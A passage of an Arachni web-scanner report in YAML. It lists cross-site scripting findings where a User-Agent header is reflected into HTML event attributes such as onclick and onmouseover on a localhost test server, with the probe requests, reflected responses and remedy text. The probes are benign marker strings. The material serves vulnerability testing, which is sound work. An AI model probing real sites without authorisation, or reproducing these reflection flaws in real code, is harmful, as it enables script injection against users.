    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onkeypress
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onkeyup
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeyup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onkeyup
      :id: <a href="/" onkeyup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeyup=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeyup</a><a href='/' onkeyup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a><a href='/' onkeyup='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeyup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onkeyup
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onclick
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "424"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onclick
      :id: <a href="/" onclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onclick=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onclick</a><a href='/' onclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a><a href='/' onclick='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onclick
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/ondblclick
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" ondblclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/ondblclick
      :id: <a href="/" ondblclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' ondblclick=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>ondblclick</a><a href='/' ondblclick="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a><a href='/' ondblclick='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>ondblclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/ondblclick
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onmousedown
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "448"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousedown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onmousedown
      :id: <a href="/" onmousedown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousedown=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousedown</a><a href='/' onmousedown="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a><a href='/' onmousedown='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousedown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onmousedown
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onmousemove
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "448"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousemove="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onmousemove
      :id: <a href="/" onmousemove="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousemove=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousemove</a><a href='/' onmousemove="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a><a href='/' onmousemove='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousemove</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onmousemove
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onmouseout
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "442"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseout="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onmouseout
      :id: <a href="/" onmouseout="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseout=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseout</a><a href='/' onmouseout="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a><a href='/' onmouseout='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseout</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onmouseout
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onmouseover
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "448"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseover="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onmouseover
